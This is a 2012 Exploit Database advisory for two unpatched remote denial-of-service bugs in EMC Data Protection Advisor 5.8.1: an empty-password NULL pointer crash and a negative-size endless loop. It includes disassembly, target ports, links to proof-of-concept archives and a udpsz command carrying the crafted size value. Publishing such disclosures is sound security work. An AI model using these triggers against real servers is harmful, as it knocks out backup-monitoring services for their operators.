EMC Data Protection Advisor 5.8.1 – Denial of Service

• Exploit Database
• 36 阅读

• 作者： Luigi Auriemma
  日期： 2012-03-31
• 类别：

  • dos
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/18688/

• #######################################################################
  
   Luigi Auriemma
  
  Application:EMC Data Protection Advisor
  http://www.emc.com/backup-and-recovery/data-protection-advisor/data-protection-advisor.htm
  Versions: <= 5.8.1
  Platforms:AIX, HP-UX, Linux, Solaris, Windows
  Bugs: A] cProcessAuthenticationData NULL pointer
  B] thread CPU 100%
  Exploitation: remote
  Date: 29 Mar 2012
  Author: Luigi Auriemma
  e-mail: aluigi@autistici.org
  web:aluigi.org
  
  
  #######################################################################
  
  
  1) Introduction
  2) Bugs
  3) The Code
  4) Fix
  
  
  #######################################################################
  
  ===============
  1) Introduction
  ===============
  
  
  From vendor's homepage:
  "EMC Data Protection Advisor: Manage service levels, reduce complexity,
  and eliminate manual efforts with EMC’s powerful data protection
  management software that automates monitoring, analysis, alerting, and
  reporting across backup, replication, and virtual environments."
  
  
  #######################################################################
  
  =======
  2) Bugs
  =======
  
  ------------------------------------------
  A] cProcessAuthenticationData NULL pointer
  ------------------------------------------
  
  The missing password field or an empty password in the
  AUTHENTICATECONNECTION command required to login leads to a NULL
  pointer dereference in the DPA_Utilities.cProcessAuthenticationData
  function:
  
  10042EA0/$ 55 PUSH EBP
  10042EA1|. 8BEC MOV EBP,ESP
  10042EA3|. 83EC 0CSUB ESP,0C
  10042EA6|. A1 B04F0C10MOV EAX,DWORD PTR DS:[100C4FB0]
  10042EAB|. 33C5 XOR EAX,EBP
  10042EAD|. 8945 FCMOV DWORD PTR SS:[EBP-4],EAX
  10042EB0|. 53 PUSH EBX
  10042EB1|. 56 PUSH ESI
  10042EB2|. 8BF1 MOV ESI,ECX
  10042EB4|. 57 PUSH EDI
  10042EB5|. 56 PUSH ESI
  10042EB6|. E8 93E3FBFFCALL DPA_Util.decodeString
  10042EBB|. 8BC8 MOV ECX,EAX
  10042EBD|. 83C4 08ADD ESP,8
  10042EC0|. 8D59 01LEA EBX,DWORD PTR DS:[ECX+1]
  10042EC3|> 8A11 /MOV DL,BYTE PTR DS:[ECX] ; strlen() NULL pointer
  10042EC5|. 83C1 01|ADD ECX,1
  10042EC8|. 84D2 |TEST DL,DL
  10042ECA|.^75 F7\JNZ SHORT DPA_Util.10042EC3
  
  
  ------------------
  B] thread CPU 100%
  ------------------
  
  Endless loop in the DPA_Utilities library while handling the protocol
  if it's used a negative 64bit size field:
  
  100138FC > 3BF1 CMP ESI,ECX
  100138FE . 75 0CJNZ SHORT DPA_Util.1001390C
  10013900 . 8B55 E4MOV EDX,DWORD PTR SS:[EBP-1C]
  10013903 . 0B55 E8OR EDX,DWORD PTR SS:[EBP-18]
  10013906 . 0F84 C1020000JE DPA_Util.10013BCD
  1001390C > 2975 DCSUB DWORD PTR SS:[EBP-24],ESI
  1001390F . 68 20870910PUSH DPA_Util.10098720; "nsReadRequest"
  ...
  100137F0 > 8B7D 08MOV EDI,DWORD PTR SS:[EBP+8]
  100137F3 > 8B75 E4MOV ESI,DWORD PTR SS:[EBP-1C]
  100137F6 > 837D E8 00 CMP DWORD PTR SS:[EBP-18],0 ; signed comparison
  100137FA . 7F 4AJG SHORT DPA_Util.10013846
  100137FC . 7C 04JL SHORT DPA_Util.10013802
  100137FE . 85F6 TEST ESI,ESI
  10013800 . 77 44JA SHORT DPA_Util.10013846
  10013802 > 837D E0 00 CMP DWORD PTR SS:[EBP-20],0 ; signed comparison
  10013806 . 0F8C 0B040000JL DPA_Util.10013C17
  1001380C . 7F 0AJG SHORT DPA_Util.10013818
  1001380E . 837D DC 00 CMP DWORD PTR SS:[EBP-24],0
  10013812 . 0F86 FF030000JBE DPA_Util.10013C17
  10013818 > BF 1B700910MOV EDI,DPA_Util.1009701B
  1001381D . 33F6 XOR ESI,ESI
  1001381F > 33C9 XOR ECX,ECX
  10013821 . 894D F4MOV DWORD PTR SS:[EBP-C],ECX
  10013824 . 894D F0MOV DWORD PTR SS:[EBP-10],ECX
  10013827 . 390B CMP DWORD PTR DS:[EBX],ECX
  10013829 . 894D F8MOV DWORD PTR SS:[EBP-8],ECX
  1001382C . 894D ECMOV DWORD PTR SS:[EBP-14],ECX
  1001382F . 0F84 C7000000JE DPA_Util.100138FC
  
  Note that this loop doesn't affect the working of the other connections
  to the affected service.
  
  
  Both the bugs can be exploited in the following services:
  - DPA_Controller on port 3916
  - DPA_Listener on port 4001
  
  
  #######################################################################
  
  ===========
  3) The Code
  ===========
  
  
  A]
  http://aluigi.org/poc/dpa_1.zip
  
  dpa_1 SERVER
  
  B]
  http://aluigi.org/testz/udpsz.zip
  
  udpsz -c "18446744073709551615/1/UNB" -T SERVER 3916 -1
  
  
  #######################################################################
  
  ======
  4) Fix
  ======
  
  
  No fix.
  
  
  #######################################################################